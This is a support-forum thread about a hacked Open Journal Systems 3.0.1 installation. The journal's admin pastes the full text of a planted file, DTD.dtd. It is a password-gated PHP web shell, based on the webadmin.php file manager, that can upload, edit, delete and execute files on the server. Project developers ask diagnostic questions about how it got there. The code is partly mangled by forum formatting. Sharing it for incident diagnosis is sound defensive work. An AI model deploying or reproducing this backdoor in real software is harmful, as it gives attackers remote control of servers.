OJS 3.0.1 hacking incident

karma · April 25, 2017, 5:19am

Our OJS 3.0.1 have been hacked. We have it upgraded from 2.4.8-1. The files folder was placed outside the root directory and we noticed multiple .phtml files found. Any idea how to fix it?

asmecher · April 25, 2017, 5:39am

Hi @karma,

Where were the .phtml files placed? Where was your files directory located?

If you’re seeing malicious .phtml files in your files directory, as long as your files directory isn’t directly web-accessible, these can’t be invoked from outside and don’t represent a danger. It’s possible that someone is creating an author account and uploading a submission in order to see if your system is exploitable but finding that it isn’t.

If on the other hand you are seeing some indication that your site has been hacked, please describe it and I’ll see what I can find.

Regards,
Alec Smecher
Public Knowledge Project Team

karma · April 25, 2017, 6:34am

Thanks Alec.
The .phtml files were found in the files directory outside the root directory (~web accessible). However, some other files were added to our current installation, with .dtd extensions. No files were deleted but an extra folder was also added.

asmecher · April 25, 2017, 1:38pm

Hi @karma,

Can you give some specifics, e.g. what files were added? I’ve never heard of .dtd files being used maliciously; perhaps there’s another explanation.

Regards,
Alec Smecher
Public Knowledge Project Team

karma · April 25, 2017, 6:05pm

The hacking file was DTD.dtd. located under lib folder. It looks like a backdoor file from searching the blogs.

asmecher · April 25, 2017, 6:09pm

Hi @karma,

That doesn’t sound like part of OJS, but I’m not aware of any way to put malicious content in a DTD file. Did it have another suffix, e.g. .php or .phtml?

Did you previously have your files directory in a publicly accessible location? If that’s the case, and your site was hacked via that mechanism, it’s necessary to take a very thorough review of the contents of your site. If it’s possible that a backdoor was installed at that time, then was preserved across the upgrade to OJS 3.x, then that might explain it.

I’m not currently aware of any holes in OJS 3.0.x, though of course if yu’re able to provide more details I’d be happy to investigate further.

Regards,
Alec Smecher
Public Knowledge Project Team

karma · April 25, 2017, 11:58pm

Hi Alex,

Here are the DTD.dtd file content:

<?php // --- pop-up

$user = “kampret”;

$pass = “kampret”;

if (($_SERVER[“PHP_AUTH_USER”] != $user) || (($_SERVER[“PHP_AUTH_PW”]) != $pass))

{

header(“WWW-Authenticate: Basic realm="no man land"”);

header(“HTTP/1.0 401 Unauthorized”);

exit();

}

//
/*
webadmin.php - a simple Web-based file manager

Copyright (C) 2004-2011 Daniel Wacker [daniel dot wacker at web dot de]

This program is free software; you can redistribute it and/or modify

it under the terms of the GNU General Public License as published by

the Free Software Foundation; either version 2 of the License, or

(at your option) any later version.

This program is distributed in the hope that it will be useful,

but WITHOUT ANY WARRANTY; without even the implied warranty of

MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

GNU General Public License for more details.

You should have received a copy of the GNU General Public License

along with this program; if not, write to the Free Software

Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.

While using this script, do NOT navigate with your browser’s back and

forward buttons! Always open files in a new browser tab!

This is Version 0.9, revision 12

=========================================================================

Changes of revision 12

[bhb at o2 dot pl]

added Polish translation

[daniel dot wacker at web dot de]

switched to UTF-8

fixed undefined variable

Changes of revision 11

[daniel dot wacker at web dot de]

fixed handling if folder isn’t readable

Changes of revision 10

[alex dash smirnov at web.de]

added Russian translation

[daniel dot wacker at web dot de]

added to achieve valid XHTML (thanks to Marc Magos)

improved delete function

[ava at asl dot se]

new list order: folders first

Changes of revision 9

[daniel dot wacker at web dot de]

added workaround for directory listing, if lstat() is disabled

fixed permisson of uploaded files (thanks to Stephan Duffner)

Changes of revision 8

[okankan at stud dot sdu dot edu dot tr]

added Turkish translation

[j at kub dot cz]

added Czech translation

[daniel dot wacker at web dot de]

improved charset handling

Changes of revision 7

[szuniga at vtr dot net]

added Spanish translation

[lars at soelgaard dot net]

added Danish translation

[daniel dot wacker at web dot de]

improved rename dialog

Changes of revision 6

[nederkoorn at tiscali dot nl]

added Dutch translation

Changes of revision 5

[daniel dot wacker at web dot de]

added language auto select

fixed symlinks in directory listing

removed word-wrap in edit textarea

Changes of revision 4

[daloan at guideo dot fr]

added French translation

[anders at wiik dot cc]

added Swedish translation

Changes of revision 3

[nzunta at gabriele dash erba dot it]

improved Italian translation

Changes of revision 2

[daniel dot wacker at web dot de]

got images work in some old browsers

fixed creation of directories

fixed files deletion

improved path handling

added missing word ‘not_created’

[till at tuxen dot de]

improved human readability of file sizes

[nzunta at gabriele dash erba dot it]

added Italian translation

Changes of revision 1

[daniel dot wacker at web dot de]

webadmin.php completely rewritten:

clean XHTML/CSS output

several files selectable

support for windows servers

no more treeview, because
 - webadmin.php is a >simple< file manager
 - performance problems (too much additional code)
 - I don't like: frames, java-script, to reload after every treeview-click
execution of shell scripts

introduced revision numbers
/* ------------------------------------------------------------------------- */

/* Your language:

‘en’ - English

‘de’ - German

‘fr’ - French

‘it’ - Italian

‘nl’ - Dutch

‘se’ - Swedish

‘sp’ - Spanish

‘dk’ - Danish

‘tr’ - Turkish

‘cs’ - Czech

‘ru’ - Russian

‘pl’ - Polish

‘auto’ - autoselect
*/
$lang = ‘auto’;

/* Homedir:

For example: ‘./’ - the script’s directory
*/
$homedir = ‘./’;

/* Size of the edit textarea
*/
$editcols = 80;
$editrows = 25;

/* -------------------------------------------

Optional configuration (remove # to enable)
*/

/* Permission of created directories:

For example: 0705 would be ‘drwx—r-x’.
*/

$dirpermission = 0705;

/* Permission of created files:

For example: 0604 would be ‘-rw----r–’.
*/

$filepermission = 0604;

/* Filenames related to the apache web server:
*/
$htaccess = ‘.htaccess’;
$htpasswd = ‘.htpasswd’;

/* ------------------------------------------------------------------------- */

if (get_magic_quotes_gpc()) {
array_walk($_GET, ‘strip’);
array_walk($_POST, ‘strip’);
array_walk($_REQUEST, ‘strip’);
}

if (array_key_exists(‘image’, $_GET)) {
header(‘Content-Type: image/gif’);
die(getimage($_GET[‘image’]));
}

if (!function_exists(‘lstat’)) {
function lstat ($filename) {
return stat($filename);
}
}

$delim = DIRECTORY_SEPARATOR;

if (function_exists(‘php_uname’)) {
$win = (strtoupper(substr(PHP_OS, 0, 3)) === ‘WIN’) ? true : false;
} else {
$win = ($delim == ‘\’) ? true : false;
}

if (!empty($_SERVER[‘PATH_TRANSLATED’])) {
$scriptdir = dirname($_SERVER[‘PATH_TRANSLATED’]);
} elseif (!empty($_SERVER[‘SCRIPT_FILENAME’])) {
$scriptdir = dirname($_SERVER[‘SCRIPT_FILENAME’]);
} elseif (function_exists(‘getcwd’)) {
$scriptdir = getcwd();
} else {
$scriptdir = ‘.’;
}
$homedir = relative2absolute($homedir, $scriptdir);

$dir = (array_key_exists(‘dir’, $_REQUEST)) ? $_REQUEST[‘dir’] : $homedir;

if (array_key_exists(‘olddir’, $_POST) && !path_is_relative($_POST[‘olddir’])) {
$dir = relative2absolute($dir, $_POST[‘olddir’]);
}

$directory = simplify_path(addslash($dir));

$files = array();
$action = ‘’;
if (!empty($_POST[‘submit_all’])) {
$action = $_POST[‘action_all’];
for ($i = 0; $i < $_POST[‘num’]; $i++) {
if (array_key_exists(“checked$i”, $_POST) && $_POST[“checked$i”] == ‘true’) {
$files = $_POST[“file$i”];
}
}
} elseif (!empty($_REQUEST[‘action’])) {
$action = $_REQUEST[‘action’];
$files = relative2absolute($_REQUEST[‘file’], $directory);
} elseif (!empty($_POST[‘submit_upload’]) && !empty($_FILES[‘upload’][‘name’])) {
$files = $_FILES[‘upload’];
$action = ‘upload’;
} elseif (array_key_exists(‘num’, $_POST)) {
for ($i = 0; $i < $_POST[‘num’]; $i++) {
if (array_key_exists(“submit$i”, $_POST)) break;
}
if ($i < $_POST[‘num’]) {
$action = $_POST[“action$i”];
$files = $_POST[“file$i”];
}
}
if (empty($action) && (!empty($_POST[‘submit_create’]) || (array_key_exists(‘focus’, $_POST) && $_POST[‘focus’] == ‘create’)) && !empty($_POST[‘create_name’])) {
$files = relative2absolute($_POST[‘create_name’], $directory);
switch ($_POST[‘create_type’]) {
case ‘directory’:
$action = ‘create_directory’;
break;
case ‘file’:
$action = ‘create_file’;
}
}
if (sizeof($files) == 0) $action = ‘’; else $file = reset($files);

if ($lang == ‘auto’) {
if (array_key_exists(‘HTTP_ACCEPT_LANGUAGE’, $_SERVER) && strlen($_SERVER[‘HTTP_ACCEPT_LANGUAGE’]) >= 2) {
$lang = substr($_SERVER[‘HTTP_ACCEPT_LANGUAGE’], 0, 2);
} else {
$lang = ‘en’;
}
}

$words = getwords($lang);

if ($site_charset == ‘auto’) {
$site_charset = $word_charset;
}

$cols = ($win) ? 4 : 7;

if (!isset($dirpermission)) {
$dirpermission = (function_exists(‘umask’)) ? (0777 & ~umask()) : 0755;
}
if (!isset($filepermission)) {
$filepermission = (function_exists(‘umask’)) ? (0666 & ~umask()) : 0644;
}

if (!empty($_SERVER[‘SCRIPT_NAME’])) {
$self = html(basename($_SERVER[‘SCRIPT_NAME’]));
} elseif (!empty($_SERVER[‘PHP_SELF’])) {
$self = html(basename($_SERVER[‘PHP_SELF’]));
} else {
$self = ‘’;
}

if (!empty($_SERVER[‘SERVER_SOFTWARE’])) {
if (strtolower(substr($_SERVER[‘SERVER_SOFTWARE’], 0, 6)) == ‘apache’) {
$apache = true;
} else {
$apache = false;
}
} else {
$apache = true;
}

switch ($action) {

case ‘view’:

if (is_script($file)) {

  /* highlight_file is a mess! */
  ob_start();
  highlight_file($file);
  $src = ereg_replace('<font color="([^"]*)">', '<span style="color: \1">', ob_get_contents());
  $src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src);
  ob_end_clean();

  html_header();
  echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2>

';


  for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n";



  echo '</code></pre>

' . $src . '

';

  html_footer();

} else {

  header('Content-Type: ' . getmimetype($file));
  header('Content-Disposition: filename=' . basename($file));

  readfile($file);

}

break;

case ‘download’:

header(‘Pragma: public’);
header(‘Expires: 0’);
header(‘Cache-Control: must-revalidate, post-check=0, pre-check=0’);
header('Content-Type: ’ . getmimetype($file));
header(‘Content-Disposition: attachment; filename=’ . basename($file) . ‘;’);
header('Content-Length: ’ . filesize($file));

readfile($file);

break;

case ‘upload’:

$dest = relative2absolute($file[‘name’], $directory);

if (@file_exists($dest)) {
listing_page(error(‘already_exists’, $dest));
} elseif (@move_uploaded_file($file[‘tmp_name’], $dest)) {
@chmod($dest, $filepermission);
listing_page(notice(‘uploaded’, $file[‘name’]));
} else {
listing_page(error(‘not_uploaded’, $file[‘name’]));
}

break;

case ‘create_directory’:

if (@file_exists($file)) {
listing_page(error(‘already_exists’, $file));
} else {
$old = @umask(0777 & ~$dirpermission);
if (@mkdir($file, $dirpermission)) {
listing_page(notice(‘created’, $file));
} else {
listing_page(error(‘not_created’, $file));
}
@umask($old);
}

break;

case ‘create_file’:

if (@file_exists($file)) {
listing_page(error(‘already_exists’, $file));
} else {
$old = @umask(0777 & ~$filepermission);
if (@touch($file)) {
edit($file);
} else {
listing_page(error(‘not_created’, $file));
}
@umask($old);
}

break;

case ‘execute’:

chdir(dirname($file));

$output = array();
$retval = 0;
exec(‘echo "./’ . basename($file) . ‘" | /bin/sh’, $output, $retval);

$error = ($retval == 0) ? false : true;

if (sizeof($output) == 0) $output = array(‘<’ . $words[‘no_output’] . ‘>’);

if ($error) {
listing_page(error(‘not_executed’, $file, implode(“\n”, $output)));
} else {
listing_page(notice(‘executed’, $file, implode(“\n”, $output)));
}

break;

case ‘delete’:

if (!empty($_POST[‘no’])) {
listing_page();
} elseif (!empty($_POST[‘yes’])) {

  $failure = array();
  $success = array();

  foreach ($files as $file) {
  	if (del($file)) {
  		$success[] = $file;
  	} else {
  		$failure[] = $file;
  	}
  }

  $message = '';
  if (sizeof($failure) > 0) {
  	$message = error('not_deleted', implode("\n", $failure));
  }
  if (sizeof($success) > 0) {
  	$message .= notice('deleted', implode("\n", $success));
  }

  listing_page($message);

} else {

  html_header();

  echo '<form action="' . $self . '" method="post">

';

  request_dump();

  echo "\t<b>" . word('really_delete') . '</b>

';

  foreach ($files as $file) {
  	echo "\t" . html($file) . "<br />\n";
  }

  echo '	</p>

';

  html_footer();

}

break;

case ‘rename’:

if (!empty($_POST[‘destination’])) {

  $dest = relative2absolute($_POST['destination'], $directory);

  if (!@file_exists($dest) && @rename($file, $dest)) {
  	listing_page(notice('renamed', $file, $dest));
  } else {
  	listing_page(error('not_renamed', $file, $dest));
  }

} else {

  $name = basename($file);

  html_header();

  echo '<form action="' . $self . '" method="post">

' . word('rename_file') . '
' . html($file) . '
' . substr($file, 0, strlen($file) - strlen($name)) . '

[ ' . word('back') . ' ]

';

  html_footer();

}

break;

case ‘move’:

if (!empty($_POST[‘destination’])) {

  $dest = relative2absolute($_POST['destination'], $directory);

  $failure = array();
  $success = array();

  foreach ($files as $file) {
  	$filename = substr($file, strlen($directory));
  	$d = $dest . $filename;
  	if (!@file_exists($d) && @rename($file, $d)) {
  		$success[] = $file;
  	} else {
  		$failure[] = $file;
  	}
  }

  $message = '';
  if (sizeof($failure) > 0) {
  	$message = error('not_moved', implode("\n", $failure), $dest);
  }
  if (sizeof($success) > 0) {
  	$message .= notice('moved', implode("\n", $success), $dest);
  }

  listing_page($message);

} else {

  html_header();

  echo '<form action="' . $self . '" method="post">

';

  request_dump();

  echo "\t<b>" . word('move_files') . '</b>

';

  foreach ($files as $file) {
  	echo "\t" . html($file) . "<br />\n";
  }

  echo '	</p>
' . word('destination') . ':

[ ' . word('back') . ' ]

';

  html_footer();

}

break;

case ‘copy’:

if (!empty($_POST[‘destination’])) {

  $dest = relative2absolute($_POST['destination'], $directory);

  if (@is_dir($dest)) {

  	$failure = array();
  	$success = array();

  	foreach ($files as $file) {
  		$filename = substr($file, strlen($directory));
  		$d = addslash($dest) . $filename;
  		if (!@is_dir($file) && !@file_exists($d) && @copy($file, $d)) {
  			$success[] = $file;
  		} else {
  			$failure[] = $file;
  		}
  	}

  	$message = '';
  	if (sizeof($failure) > 0) {
  		$message = error('not_copied', implode("\n", $failure), $dest);
  	}
  	if (sizeof($success) > 0) {
  		$message .= notice('copied', implode("\n", $success), $dest);
  	}

  	listing_page($message);

  } else {

  	if (!@file_exists($dest) && @copy($file, $dest)) {
  		listing_page(notice('copied', $file, $dest));
  	} else {
  		listing_page(error('not_copied', $file, $dest));
  	}

} else {

  html_header();

  echo '<form action="' . $self . '" method="post">

';

  request_dump();

  echo "\n<b>" . word('copy_files') . '</b>

';

  foreach ($files as $file) {
  	echo "\t" . html($file) . "<br />\n";
  }

  echo '	</p>
' . word('destination') . ':

[ ' . word('back') . ' ]

';

  html_footer();

}

break;

case ‘create_symlink’:

if (!empty($_POST[‘destination’])) {

  $dest = relative2absolute($_POST['destination'], $directory);

  if (substr($dest, -1, 1) == $delim) $dest .= basename($file);

  if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file);

  if (!@file_exists($dest) && @symlink($file, $dest)) {
  	listing_page(notice('symlinked', $file, $dest));
  } else {
  	listing_page(error('not_symlinked', $file, $dest));
  }

} else {

  html_header();

  echo '<form action="' . $self . '" method="post">

' . word('destination') . ': ' . html($file) . '
' . word('relative') . '

' . word('symlink') . ':

[ ' . word('back') . ' ]

';

  html_footer();

}

break;

case ‘edit’:

if (!empty($_POST[‘save’])) {

  $content = str_replace("\r\n", "\n", $_POST['content']);

  if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
  	listing_page(notice('saved', $file));
  } else {
  	listing_page(error('not_saved', $file));
  }

} else {

  if (@is_readable($file) && @is_writable($file)) {
  	edit($file);
  } else {
  	listing_page(error('not_edited', $file));
  }

}

break;

case ‘permission’:

if (!empty($_POST[‘set’])) {

  $mode = 0;
  if (!empty($_POST['ur'])) $mode |= 0400; if (!empty($_POST['uw'])) $mode |= 0200; if (!empty($_POST['ux'])) $mode |= 0100;
  if (!empty($_POST['gr'])) $mode |= 0040; if (!empty($_POST['gw'])) $mode |= 0020; if (!empty($_POST['gx'])) $mode |= 0010;
  if (!empty($_POST['or'])) $mode |= 0004; if (!empty($_POST['ow'])) $mode |= 0002; if (!empty($_POST['ox'])) $mode |= 0001;

  if (@chmod($file, $mode)) {
  	listing_page(notice('permission_set', $file, decoct($mode)));
  } else {
  	listing_page(error('permission_not_set', $file, decoct($mode)));
  }

} else {

  html_header();

  $mode = fileperms($file);

  echo '<form action="' . $self . '" method="post">

' . phrase('permission_for', $file) . '

' . word('owner') . ' ' . word('group') . ' ' . word('other') . '

' . word('read') . ':

' . word('write') . ':

' . word('execute') . ':

[ ' . word('back') . ' ]

';

  html_footer();

}

break;

default:

listing_page();

}

/* ------------------------------------------------------------------------- */

function getlist ($directory) {
global $delim, $win;

if ($d = @opendir($directory)) {

  while (($filename = @readdir($d)) !== false) {

  	$path = $directory . $filename;

  	if ($stat = @lstat($path)) {

  		$file = array(
  			'filename'    => $filename,
  			'path'        => $path,
  			'is_file'     => @is_file($path),
  			'is_dir'      => @is_dir($path),
  			'is_link'     => @is_link($path),
  			'is_readable' => @is_readable($path),
  			'is_writable' => @is_writable($path),
  			'size'        => $stat['size'],
  			'permission'  => $stat['mode'],
  			'owner'       => $stat['uid'],
  			'group'       => $stat['gid'],
  			'mtime'       => @filemtime($path),
  			'atime'       => @fileatime($path),
  			'ctime'       => @filectime($path)
  		);

  		if ($file['is_dir']) {
  			$file['is_executable'] = @file_exists($path . $delim . '.');
  		} else {
  			if (!$win) {
  				$file['is_executable'] = @is_executable($path);
  			} else {
  				$file['is_executable'] = true;
  			}
  		}

  		if ($file['is_link']) $file['target'] = @readlink($path);

  		if (function_exists('posix_getpwuid')) $file['owner_name'] = @reset(posix_getpwuid($file['owner']));
  		if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group']));

  		$files[] = $file;

  return $files;

} else {
return false;
}

}

function sortlist ($list, $key, $reverse) {

$dirs = array();
$files = array();

for ($i = 0; $i < sizeof($list); $i++) {
if ($list[$i][‘is_dir’]) $dirs = $list[$i];
else $files = $list[$i];
}

quicksort($dirs, 0, sizeof($dirs) - 1, $key);
if ($reverse) $dirs = array_reverse($dirs);

quicksort($files, 0, sizeof($files) - 1, $key);
if ($reverse) $files = array_reverse($files);

return array_merge($dirs, $files);

}

function quicksort (&$array, $first, $last, $key) {

if ($first < $last) {

  $cmp = $array[floor(($first + $last) / 2)][$key];

  $l = $first;
  $r = $last;

  while ($l <= $r) {

  	while ($array[$l][$key] < $cmp) $l++;
  	while ($array[$r][$key] > $cmp) $r--;

  	if ($l <= $r) {

  		$tmp = $array[$l];
  		$array[$l] = $array[$r];
  		$array[$r] = $tmp;

  		$l++;
  		$r--;

  quicksort($array, $first, $r, $key);
  quicksort($array, $l, $last, $key);

}

function permission_octal2string ($mode) {

if (($mode & 0xC000) === 0xC000) {
$type = ‘s’;
} elseif (($mode & 0xA000) === 0xA000) {
$type = ‘l’;
} elseif (($mode & 0x8000) === 0x8000) {
$type = ‘-’;
} elseif (($mode & 0x6000) === 0x6000) {
$type = ‘b’;
} elseif (($mode & 0x4000) === 0x4000) {
$type = ‘d’;
} elseif (($mode & 0x2000) === 0x2000) {
$type = ‘c’;
} elseif (($mode & 0x1000) === 0x1000) {
$type = ‘p’;
} else {
$type = ‘?’;
}

$owner = ($mode & 00400) ? ‘r’ : ‘-’;
$owner .= ($mode & 00200) ? ‘w’ : ‘-’;
if ($mode & 0x800) {
$owner .= ($mode & 00100) ? ‘s’ : ‘S’;
} else {
$owner .= ($mode & 00100) ? ‘x’ : ‘-’;
}

$group = ($mode & 00040) ? ‘r’ : ‘-’;
$group .= ($mode & 00020) ? ‘w’ : ‘-’;
if ($mode & 0x400) {
$group .= ($mode & 00010) ? ‘s’ : ‘S’;
} else {
$group .= ($mode & 00010) ? ‘x’ : ‘-’;
}

$other = ($mode & 00004) ? ‘r’ : ‘-’;
$other .= ($mode & 00002) ? ‘w’ : ‘-’;
if ($mode & 0x200) {
$other .= ($mode & 00001) ? ‘t’ : ‘T’;
} else {
$other .= ($mode & 00001) ? ‘x’ : ‘-’;
}

return $type . $owner . $group . $other;

}

function is_script ($filename) {
return ereg(‘.php$|.php3$|.php4$|.php5$’, $filename);
}

function getmimetype ($filename) {
static $mimes = array(
‘.jpg$|.jpeg$’ => ‘image/jpeg’,
‘.gif$’ => ‘image/gif’,
‘.png$’ => ‘image/png’,
‘.html$|.html$’ => ‘text/html’,
‘.txt$|.asc$’ => ‘text/plain’,
‘.xml$|.xsl$’ => ‘application/xml’,
‘.pdf$’ => ‘application/pdf’
);

foreach ($mimes as $regex => $mime) {
if (eregi($regex, $filename)) return $mime;
}

// return ‘application/octet-stream’;
return ‘text/plain’;

}

function del ($file) {
global $delim;

if (!file_exists($file)) return false;

if (@is_dir($file) && !@is_link($file)) {

  $success = false;

  if (@rmdir($file)) {

  	$success = true;

  } elseif ($dir = @opendir($file)) {

  	$success = true;

  	while (($f = readdir($dir)) !== false) {
  		if ($f != '.' && $f != '..' && !del($file . $delim . $f)) {
  			$success = false;
  		}
  	}
  	closedir($dir);

  	if ($success) $success = @rmdir($file);

  return $success;

}

return @unlink($file);

}

function addslash ($directory) {
global $delim;

if (substr($directory, -1, 1) != $delim) {
return $directory . $delim;
} else {
return $directory;
}

}

function relative2absolute ($string, $directory) {

if (path_is_relative($string)) {
return simplify_path(addslash($directory) . $string);
} else {
return simplify_path($string);
}

}

function path_is_relative ($path) {
global $win;

if ($win) {
return (substr($path, 1, 1) != ‘:’);
} else {
return (substr($path, 0, 1) != ‘/’);
}

}

function absolute2relative ($directory, $target) {
global $delim;

$path = ‘’;
while ($directory != $target) {
if ($directory == substr($target, 0, strlen($directory))) {
$path .= substr($target, strlen($directory));
break;
} else {
$path .= ‘…’ . $delim;
$directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1);
}
}
if ($path == ‘’) $path = ‘.’;

return $path;

}

function simplify_path ($path) {
global $delim;

if (@file_exists($path) && function_exists(‘realpath’) && @realpath($path) != ‘’) {
$path = realpath($path);
if (@is_dir($path)) {
return addslash($path);
} else {
return $path;
}
}

$pattern = $delim . ‘.’ . $delim;

if (@is_dir($path)) {
$path = addslash($path);
}

while (strpos($path, $pattern) !== false) {
$path = str_replace($pattern, $delim, $path);
}

$e = addslashes($delim);
$regex = $e . ‘((.[^.’ . $e . ‘][^’ . $e . ‘])|(..[^’ . $e . ‘]+)|([^.][^’ . $e . ']))’ . $e . ‘..’ . $e;

while (ereg($regex, $path)) {
$path = ereg_replace($regex, $delim, $path);
}

return $path;

}

function human_filesize ($filesize) {

$suffices = ‘kMGTPE’;

$n = 0;
while ($filesize >= 1000) {
$filesize /= 1024;
$n++;
}

$filesize = round($filesize, 3 - strpos($filesize, ‘.’));

if (strpos($filesize, ‘.’) !== false) {
while (in_array(substr($filesize, -1, 1), array(‘0’, ‘.’))) {
$filesize = substr($filesize, 0, strlen($filesize) - 1);
}
}

$suffix = (($n == 0) ? ‘’ : substr($suffices, $n - 1, 1));

return $filesize . " {$suffix}B";

}

function strip (&$str) {
$str = stripslashes($str);
}

/* ------------------------------------------------------------------------- */

function listing_page ($message = null) {
global $self, $directory, $sort, $reverse;

html_header();

$list = getlist($directory);

if (array_key_exists(‘sort’, $_GET)) $sort = $_GET[‘sort’]; else $sort = ‘filename’;
if (array_key_exists(‘reverse’, $_GET) && $_GET[‘reverse’] == ‘true’) $reverse = true; else $reverse = false;

echo '
webadmin.php

';

directory_choice();

if (!empty($message)) {
spacer();
echo $message;
}

if (@is_writable($directory)) {
upload_box();
create_box();
} else {
spacer();
}

if ($list) {
$list = sortlist($list, $sort, $reverse);
listing($list);
} else {
echo error(‘not_readable’, $directory);
}

echo '

';

html_footer();

}

function listing ($list) {
global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self;

echo '
';

column_title(‘filename’, $sort, $reverse);
column_title(‘size’, $sort, $reverse);

if (!$win) {
column_title(‘permission’, $sort, $reverse);
column_title(‘owner’, $sort, $reverse);
column_title(‘group’, $sort, $reverse);
}

…

ajnyga · April 26, 2017, 3:35am

Alec had an important question there above: “Did you previously have your files directory in a publicly accessible location?”

Another important question is that do you have other similar applications on the same server, maybe in a different folder?

With the dtd file extension that file is useless for a hacker. But it changes if the hacker can change the extension to php. I think that the dtd is there just to make that file less apparent.

karma · April 26, 2017, 5:15am

We took over after the upgrade from 2.4.8-1… so I am not sure if the files directory was publicly accessible or not before the upgrade.

We are not running any other application on the server aside from OJS.

' . word('destination') . ':	' . html($file) . ' ' . word('relative') . '
' . word('symlink') . ':